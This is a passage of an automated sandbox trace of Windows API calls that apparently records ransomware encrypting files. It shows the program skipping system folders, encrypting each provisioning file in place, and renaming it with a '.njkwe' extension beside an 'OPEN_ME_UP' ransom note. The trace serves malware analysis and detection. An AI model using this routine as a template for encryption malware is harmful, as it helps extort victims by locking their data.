lpString2="System Volume Information") returned -1 [0076.985] lstrcmpiW (lpString1="156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0076.985] lstrcmpiW (lpString1="156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0076.985] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0076.985] StrStrIW (lpFirst="156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0076.985] lstrcmpW (lpString1="156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.985] lstrcmpW (lpString1="156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0076.985] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\156__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.985] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\156__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.985] GetTickCount () returned 0x115395c [0076.985] GetTickCount () returned 0x115395c [0076.985] GetTickCount () returned 0x115395c [0076.985] GetTickCount () returned 0x115395c [0076.985] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.985] GetProcessHeap () returned 0xbe0000 [0076.985] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.985] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0076.986] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.986] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0076.986] GetProcessHeap () returned 0xbe0000 [0076.986] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.987] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.987] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.987] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.987] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.987] CloseHandle (hObject=0x43c) returned 1 [0076.988] GetProcessHeap () returned 0xbe0000 [0076.988] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.988] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0076.988] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\156__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\156__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.988] GetProcessHeap () returned 0xbe0000 [0076.988] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.988] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90601b92, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90601b92, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90601b92, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml", cAlternateFileName="157__C~1.PRO")) returned 1 [0076.988] lstrcmpiW (lpString1="157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.988] lstrcmpiW (lpString1="157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.988] lstrcmpiW (lpString1="157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.989] lstrcmpiW (lpString1="157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.989] lstrcmpiW (lpString1="157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.989] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml") returned 167 [0076.989] StrStrIW (lpFirst="157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.989] lstrcmpW (lpString1="157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.989] lstrcmpW (lpString1="157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.989] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\157__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.989] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\157__connections_cellular_cosmote greece (greece)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.989] GetTickCount () returned 0x115395c [0076.989] GetTickCount () returned 0x115395c [0076.989] GetTickCount () returned 0x115395c [0076.989] GetTickCount () returned 0x115395c [0076.989] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.989] GetProcessHeap () returned 0xbe0000 [0076.989] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.989] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0076.991] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.991] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0076.991] GetProcessHeap () returned 0xbe0000 [0076.991] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.991] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.991] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.991] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.991] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.991] CloseHandle (hObject=0x43c) returned 1 [0076.991] GetProcessHeap () returned 0xbe0000 [0076.991] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.991] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 187 [0076.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\157__connections_cellular_cosmote greece (greece)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\157__Connections_Cellular_Cosmote Greece (Greece)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\157__connections_cellular_cosmote greece (greece)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.992] GetProcessHeap () returned 0xbe0000 [0076.992] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.992] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90627dfd, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90627dfd, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90627dfd, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x284, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml", cAlternateFileName="158__C~1.PRO")) returned 1 [0076.992] lstrcmpiW (lpString1="158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.992] lstrcmpiW (lpString1="158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.992] lstrcmpiW (lpString1="158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.992] lstrcmpiW (lpString1="158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.992] lstrcmpiW (lpString1="158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.992] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml") returned 162 [0076.992] StrStrIW (lpFirst="158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.992] lstrcmpW (lpString1="158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.993] lstrcmpW (lpString1="158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.993] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\158__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.993] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\158__connections_cellular_q-telecom (greece)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.993] GetTickCount () returned 0x115395c [0076.993] GetTickCount () returned 0x115395c [0076.993] GetTickCount () returned 0x115395c [0076.993] GetTickCount () returned 0x115395c [0076.993] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.993] GetProcessHeap () returned 0xbe0000 [0076.993] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.993] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x284, lpOverlapped=0x0) returned 1 [0076.995] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.995] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x284, lpOverlapped=0x0) returned 1 [0076.995] GetProcessHeap () returned 0xbe0000 [0076.995] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.995] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.995] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.995] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.995] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.995] CloseHandle (hObject=0x43c) returned 1 [0076.995] GetProcessHeap () returned 0xbe0000 [0076.995] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.995] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0076.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\158__connections_cellular_q-telecom (greece)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\158__Connections_Cellular_Q-telecom (Greece)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\158__connections_cellular_q-telecom (greece)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.996] GetProcessHeap () returned 0xbe0000 [0076.996] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.996] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90627dfd, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90627dfd, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90627dfd, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml", cAlternateFileName="159__C~1.PRO")) returned 1 [0076.996] lstrcmpiW (lpString1="159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.996] lstrcmpiW (lpString1="159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.996] lstrcmpiW (lpString1="159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.996] lstrcmpiW (lpString1="159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.996] lstrcmpiW (lpString1="159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.996] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml") returned 168 [0076.996] StrStrIW (lpFirst="159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.996] lstrcmpW (lpString1="159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.996] lstrcmpW (lpString1="159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.996] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\159__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.996] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\159__connections_cellular_telestet (stet) (greece)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.997] GetTickCount () returned 0x115395c [0076.997] GetTickCount () returned 0x115395c [0076.997] GetTickCount () returned 0x115395c [0076.997] GetTickCount () returned 0x115395c [0076.997] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.997] GetProcessHeap () returned 0xbe0000 [0076.997] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.997] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0076.998] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.998] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0076.999] GetProcessHeap () returned 0xbe0000 [0076.999] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.999] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.999] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.999] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.999] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.999] CloseHandle (hObject=0x43c) returned 1 [0076.999] GetProcessHeap () returned 0xbe0000 [0076.999] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.999] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0076.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\159__connections_cellular_telestet (stet) (greece)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\159__Connections_Cellular_Telestet (STET) (Greece)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\159__connections_cellular_telestet (stet) (greece)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.000] GetProcessHeap () returned 0xbe0000 